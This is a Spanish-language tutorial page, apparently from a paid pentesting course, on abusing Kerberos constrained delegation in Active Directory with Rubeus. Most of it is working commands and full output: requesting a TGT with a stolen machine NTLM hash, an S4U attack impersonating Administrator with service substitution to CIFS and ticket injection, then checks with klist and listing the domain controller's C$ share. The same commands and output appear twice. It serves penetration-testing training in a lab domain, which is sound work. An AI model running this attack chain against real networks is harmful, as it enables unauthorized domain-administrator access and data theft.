Utilizando Rubeus

Para llevar tu aprendizaje al siguiente nivel y practicar estas técnicas de manera segura y efectiva, te invitamos a adquirir acceso premium a nuestro material de curso. No pierdas esta oportunidad de profundizar tus conocimientos. Para más información y adquirir tu acceso, visita nuestro canal de ventas: . ¡Te esperamos para empezar este viaje juntos!

Se recomienda realizar lectura sobre S4U (Service for User)

[!] Found constrained delegation rights for Computer 'USER-SERVER$':
sAMAccountName:                         USER-SERVER$
distinguishedName:                      CN=USER-SERVER,CN=Computers,DC=spartancybersec,DC=corp
objectSid:                              S-1-5-21-1861162130-2580302541-221646211-1129
operatingsystem:                        Windows Server 2019 Datacenter
[+] msDS-AllowedToDelegateTo:           HOST/First-DC.spartancybersec.corp/spartancybersec.corp
                                        HOST/First-DC.spartancybersec.corp
                                        HOST/First-DC
pwdLastSet:                             09/19/2022 23:43:39
[*] lastLogonTimestamp:                 09/19/2022 23:43:39 (Computer is likely not online anymore!)
userAccountControl:                     WORKSTATION_TRUST_ACCOUNT, TRUSTED_TO_AUTH_FOR_DELEGATION

Para realizar este ataque sera necesario suplantar o impersonar el equipo: USER-SERVER$

Para ello podriamos utilizar el HASH del computador que podria ser extraido con tecnicas explicadas en Utilizando Mimikatz

Despues de la extraccion de los hashes, ejecutaremos lo siguiente:

PS C:\> ./Rubeus.exe asktgt /user:USER-SERVER /ntlm:dadef894e564c991a5a5714e0a7efc67 /domain:spartancybersec.corp /outfile:userserver.tgt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.3

[*] Action: Ask TGT

[*] Using rc4_hmac hash: dadef894e564c991a5a5714e0a7efc67
[*] Building AS-REQ (w/ preauth) for: 'spartancybersec.corp\USER-SERVER'
[*] Using domain controller: 10.0.1.100:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIGCDCCBgSgAwIBBaEDAgEWooIFAjCCBP5hggT6MIIE9qADAgEFoRYbFFNQQVJUQU5DWUJFUlNFQy5D
T1JQoikwJ6ADAgECoSAwHhsGa3JidGd0GxRzcGFydGFuY3liZXJzZWMuY29ycKOCBKowggSmoAMCARKh
AwIBAqKCBJgEggSUr/Di1j1ebiwJCZjeb7U3zgPR7x6U9+GUwdq8ABlMoBlqWHTM32UOF6nWwAf5ifwJ
No9PEqHwWfajK3wkmVYMCgb2cyHeolfED7ktQgdsVB6PjDY5OrKH9Zi1euaVSkddO3NduwWshLp8k+Hz
Zh16a+haZZb7ATjR99PAFli4vNlKR2z67kZjvSW4lRlNck7DDxmWf2wDzI4OFyKQU44wZ4d+RESUMIDO

[*] Ticket written to userserver.tgt


  ServiceName              :  krbtgt/spartancybersec.corp
  ServiceRealm             :  SPARTANCYBERSEC.CORP
  UserName                 :  USER-SERVER (NT_PRINCIPAL)
  UserRealm                :  SPARTANCYBERSEC.CORP
  StartTime                :  11/14/2023 2:58:44 AM
  EndTime                  :  11/14/2023 12:58:44 PM
  RenewTill                :  11/21/2023 2:58:44 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  GljWkJozwxjYvBkGG9cWJA==
  ASREP (key)              :  DADEF894E564C991A5A5714E0A7EFC67

El resultado del comando indica que la solicitud del TGT ha sido exitosa, y el TGT obtenido se presenta en formato base64 y fue almacenado en el fichero llamado userserver.tgt

Ahora que ya tenemos un TGT de USER-SERVER, se procede con la ejecuccion del siguiente comando:

PS C:\> .\Rubeus.exe s4u /ticket:userserver.tgt /msdsspn:"HOST/First-DC.spartancybersec.corp" /impersonateuser:Administrator /altservice:CIFS /ptt

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.2.3

[*] Action: S4U

[*] Action: S4U

[*] Building S4U2self request for: 'USER-SERVER@SPARTANCYBERSEC.CORP'
[*] Using domain controller: First-DC.spartancybersec.corp (10.0.1.100)
[*] Sending S4U2self request to 10.0.1.100:88
[+] S4U2self success!
[*] Got a TGS for 'Administrator' to 'USER-SERVER@SPARTANCYBERSEC.CORP'
[*] base64(ticket.kirbi):

      doIGCDCCBgSgAwIBBaEDAgEWooIFAjCCBP5hggT6MIIE9qADAgEFoRYbFFNQQVJUQU5DWUJFUlNFQy5D
T1JQoikwJ6ADAgECoSAwHhsGa3JidGd0GxRzcGFydGFuY3liZXJzZWMuY29ycKOCBKowggSmoAMCARKh
AwIBAqKCBJgEggSUr/Di1j1ebiwJCZjeb7U3zgPR7x6U9+GUwdq8ABlMoBlqWHTM32UOF6nWwAf5ifwJ
No9PEqHwWfajK3wkmVYMCgb2cyHeolfED7ktQgdsVB6PjDY5OrKH9Zi1euaVSkddO3NduwWshLp8k+Hz
Zh16a+haZZb7ATjR99PAFli4vNlKR2z67kZjvSW4lRlNck7DDxmWf2wDzI4OFyKQU44wZ4d+RESUMIDO

[*] Impersonating user 'Administrator' to target SPN 'HOST/First-DC.spartancybersec.corp'
[*]   Final ticket will be for the alternate service 'CIFS'
[*] Building S4U2proxy request for service: 'HOST/First-DC.spartancybersec.corp'
[*] Using domain controller: First-DC.spartancybersec.corp (10.0.1.100)
[*] Sending S4U2proxy request to domain controller 10.0.1.100:88
[+] S4U2proxy success!
[*] Substituting alternative service name 'CIFS'
[*] base64(ticket.kirbi) for SPN 'CIFS/First-DC.spartancybersec.corp':

      doIGCDCCBgSgAwIBBaEDAgEWooIFAjCCBP5hggT6MIIE9qADAgEFoRYbFFNQQVJUQU5DWUJFUlNFQy5D
T1JQoikwJ6ADAgECoSAwHhsGa3JidGd0GxRzcGFydGFuY3liZXJzZWMuY29ycKOCBKowggSmoAMCARKh
AwIBAqKCBJgEggSUr/Di1j1ebiwJCZjeb7U3zgPR7x6U9+GUwdq8ABlMoBlqWHTM32UOF6nWwAf5ifwJ
No9PEqHwWfajK3wkmVYMCgb2cyHeolfED7ktQgdsVB6PjDY5OrKH9Zi1euaVSkddO3NduwWshLp8k+Hz
Zh16a+haZZb7ATjR99PAFli4vNlKR2z67kZjvSW4lRlNck7DDxmWf2wDzI4OFyKQU44wZ4d+RESUMIDO
[+] Ticket successfully imported!

Este comando utiliza Rubeus para realizar un ataque S4U (Service for User):

S4U2self: Se construye y envía una solicitud S4U2self para obtener un Ticket Granting Service (TGS) para el usuario "Administrator" en nombre de "USER-SERVER".
S4U2proxy con Alteración de Servicio: Se realiza una solicitud S4U2proxy con el TGS obtenido, pidiendo un ticket para el servicio "HOST/First-DC.spartancybersec.corp". Luego, se sustituye este servicio por "CIFS", cambiando el servicio al que originalmente estaba destinado el ticket.
Resultado: Se obtiene exitosamente un ticket que permite al atacante actuar como "Administrator" para acceder al servicio "CIFS" en "First-DC.spartancybersec.corp". Este ticket es luego importado para su uso en el sistema del atacante.

Este ataque permite al atacante, que originalmente solo controlaba "USER-SERVER", escalar privilegios e impersonar a "Administrator" para acceder a recursos que de otro modo estarían fuera de su alcance.

Nosotros podemos validar que el ataque fue realizado exitosamente con el siguiente comando explicado en Enumeracion con klist

PS C:\> klist

Current LogonId is 0:0x306aa
Cached Tickets: (2)

#0>     Client: Administrator @ SPARTANCYBERSEC.CORP
        Server: CIFS/First-DC.spartancybersec.corp @ SPARTANCYBERSEC.CORP
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
        Start Time: 11/14/2023 3:05:55 (local)
        End Time:   11/14/2023 12:58:44 (local)
        Renew Time: 11/21/2023 2:58:44 (local)
        Session Key Type: AES-128-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:

#1>     Client: Administrator @ SPARTANCYBERSEC.CORP
        Server: HOST/First-DC.spartancybersec.corp @ SPARTANCYBERSEC.CORP
        KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
        Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize
        Start Time: 11/14/2023 2:58:52 (local)
        End Time:   11/14/2023 12:58:44 (local)
        Renew Time: 11/21/2023 2:58:44 (local)
        Session Key Type: AES-128-CTS-HMAC-SHA1-96
        Cache Flags: 0
        Kdc Called:

PS C:\> dir \\First-DC.spartancybersec.corp\c$

    Directory: \\First-DC.spartancybersec.corp\c$

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       11/14/2018   6:56 AM                EFI
d-----       11/14/2023   2:10 AM                NTDS
d-----        5/13/2020   5:58 PM                PerfLogs
d-r---        9/19/2022  11:23 PM                Program Files
d-----        9/19/2022  11:47 PM                Program Files (x86)
d-r---        9/19/2022  11:40 PM                Users
d-----        11/7/2023   6:04 AM                Windows

AnteriorComputadora SiguienteDnsAdmins

Última actualización hace 9 meses

¿Te fue útil?

[!] Found constrained delegation rights for Computer 'USER-SERVER$': sAMAccountName: USER-SERVER$ distinguishedName: CN=USER-SERVER,CN=Computers,DC=spartancybersec,DC=corp objectSid: S-1-5-21-1861162130-2580302541-221646211-1129 operatingsystem: Windows Server 2019 Datacenter [+] msDS-AllowedToDelegateTo: HOST/First-DC.spartancybersec.corp/spartancybersec.corp HOST/First-DC.spartancybersec.corp HOST/First-DC pwdLastSet: 09/19/2022 23:43:39 [*] lastLogonTimestamp: 09/19/2022 23:43:39 (Computer is likely not online anymore!) userAccountControl: WORKSTATION_TRUST_ACCOUNT, TRUSTED_TO_AUTH_FOR_DELEGATION

PS C:\> ./Rubeus.exe asktgt /user:USER-SERVER /ntlm:dadef894e564c991a5a5714e0a7efc67 /domain:spartancybersec.corp /outfile:userserver.tgt ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.2.3 [*] Action: Ask TGT [*] Using rc4_hmac hash: dadef894e564c991a5a5714e0a7efc67 [*] Building AS-REQ (w/ preauth) for: 'spartancybersec.corp\USER-SERVER' [*] Using domain controller: 10.0.1.100:88 [+] TGT request successful! [*] base64(ticket.kirbi): doIGCDCCBgSgAwIBBaEDAgEWooIFAjCCBP5hggT6MIIE9qADAgEFoRYbFFNQQVJUQU5DWUJFUlNFQy5D T1JQoikwJ6ADAgECoSAwHhsGa3JidGd0GxRzcGFydGFuY3liZXJzZWMuY29ycKOCBKowggSmoAMCARKh AwIBAqKCBJgEggSUr/Di1j1ebiwJCZjeb7U3zgPR7x6U9+GUwdq8ABlMoBlqWHTM32UOF6nWwAf5ifwJ No9PEqHwWfajK3wkmVYMCgb2cyHeolfED7ktQgdsVB6PjDY5OrKH9Zi1euaVSkddO3NduwWshLp8k+Hz Zh16a+haZZb7ATjR99PAFli4vNlKR2z67kZjvSW4lRlNck7DDxmWf2wDzI4OFyKQU44wZ4d+RESUMIDO [*] Ticket written to userserver.tgt ServiceName : krbtgt/spartancybersec.corp ServiceRealm : SPARTANCYBERSEC.CORP UserName : USER-SERVER (NT_PRINCIPAL) UserRealm : SPARTANCYBERSEC.CORP StartTime : 11/14/2023 2:58:44 AM EndTime : 11/14/2023 12:58:44 PM RenewTill : 11/21/2023 2:58:44 AM Flags : name_canonicalize, pre_authent, initial, renewable, forwardable KeyType : rc4_hmac Base64(key) : GljWkJozwxjYvBkGG9cWJA== ASREP (key) : DADEF894E564C991A5A5714E0A7EFC67

PS C:\> .\Rubeus.exe s4u /ticket:userserver.tgt /msdsspn:"HOST/First-DC.spartancybersec.corp" /impersonateuser:Administrator /altservice:CIFS /ptt ______ _ (_____ \ | | _____) )_ _| |__ _____ _ _ ___ | __ /| | | | _ \| ___ | | | |/___) | | \ \| |_| | |_) ) ____| |_| |___ | |_| |_|____/|____/|_____)____/(___/ v2.2.3 [*] Action: S4U [*] Action: S4U [*] Building S4U2self request for: 'USER-SERVER@SPARTANCYBERSEC.CORP' [*] Using domain controller: First-DC.spartancybersec.corp (10.0.1.100) [*] Sending S4U2self request to 10.0.1.100:88 [+] S4U2self success! [*] Got a TGS for 'Administrator' to 'USER-SERVER@SPARTANCYBERSEC.CORP' [*] base64(ticket.kirbi): doIGCDCCBgSgAwIBBaEDAgEWooIFAjCCBP5hggT6MIIE9qADAgEFoRYbFFNQQVJUQU5DWUJFUlNFQy5D T1JQoikwJ6ADAgECoSAwHhsGa3JidGd0GxRzcGFydGFuY3liZXJzZWMuY29ycKOCBKowggSmoAMCARKh AwIBAqKCBJgEggSUr/Di1j1ebiwJCZjeb7U3zgPR7x6U9+GUwdq8ABlMoBlqWHTM32UOF6nWwAf5ifwJ No9PEqHwWfajK3wkmVYMCgb2cyHeolfED7ktQgdsVB6PjDY5OrKH9Zi1euaVSkddO3NduwWshLp8k+Hz Zh16a+haZZb7ATjR99PAFli4vNlKR2z67kZjvSW4lRlNck7DDxmWf2wDzI4OFyKQU44wZ4d+RESUMIDO [*] Impersonating user 'Administrator' to target SPN 'HOST/First-DC.spartancybersec.corp' [*] Final ticket will be for the alternate service 'CIFS' [*] Building S4U2proxy request for service: 'HOST/First-DC.spartancybersec.corp' [*] Using domain controller: First-DC.spartancybersec.corp (10.0.1.100) [*] Sending S4U2proxy request to domain controller 10.0.1.100:88 [+] S4U2proxy success! [*] Substituting alternative service name 'CIFS' [*] base64(ticket.kirbi) for SPN 'CIFS/First-DC.spartancybersec.corp': doIGCDCCBgSgAwIBBaEDAgEWooIFAjCCBP5hggT6MIIE9qADAgEFoRYbFFNQQVJUQU5DWUJFUlNFQy5D T1JQoikwJ6ADAgECoSAwHhsGa3JidGd0GxRzcGFydGFuY3liZXJzZWMuY29ycKOCBKowggSmoAMCARKh AwIBAqKCBJgEggSUr/Di1j1ebiwJCZjeb7U3zgPR7x6U9+GUwdq8ABlMoBlqWHTM32UOF6nWwAf5ifwJ No9PEqHwWfajK3wkmVYMCgb2cyHeolfED7ktQgdsVB6PjDY5OrKH9Zi1euaVSkddO3NduwWshLp8k+Hz Zh16a+haZZb7ATjR99PAFli4vNlKR2z67kZjvSW4lRlNck7DDxmWf2wDzI4OFyKQU44wZ4d+RESUMIDO [+] Ticket successfully imported!

PS C:\> klist Current LogonId is 0:0x306aa Cached Tickets: (2) #0> Client: Administrator @ SPARTANCYBERSEC.CORP Server: CIFS/First-DC.spartancybersec.corp @ SPARTANCYBERSEC.CORP KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize Start Time: 11/14/2023 3:05:55 (local) End Time: 11/14/2023 12:58:44 (local) Renew Time: 11/21/2023 2:58:44 (local) Session Key Type: AES-128-CTS-HMAC-SHA1-96 Cache Flags: 0 Kdc Called: #1> Client: Administrator @ SPARTANCYBERSEC.CORP Server: HOST/First-DC.spartancybersec.corp @ SPARTANCYBERSEC.CORP KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40a50000 -> forwardable renewable pre_authent ok_as_delegate name_canonicalize Start Time: 11/14/2023 2:58:52 (local) End Time: 11/14/2023 12:58:44 (local) Renew Time: 11/21/2023 2:58:44 (local) Session Key Type: AES-128-CTS-HMAC-SHA1-96 Cache Flags: 0 Kdc Called:

PS C:\> dir \\First-DC.spartancybersec.corp\c$ Directory: \\First-DC.spartancybersec.corp\c$ Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 11/14/2018 6:56 AM EFI d----- 11/14/2023 2:10 AM NTDS d----- 5/13/2020 5:58 PM PerfLogs d-r--- 9/19/2022 11:23 PM Program Files d----- 9/19/2022 11:47 PM Program Files (x86) d-r--- 9/19/2022 11:40 PM Users d----- 11/7/2023 6:04 AM Windows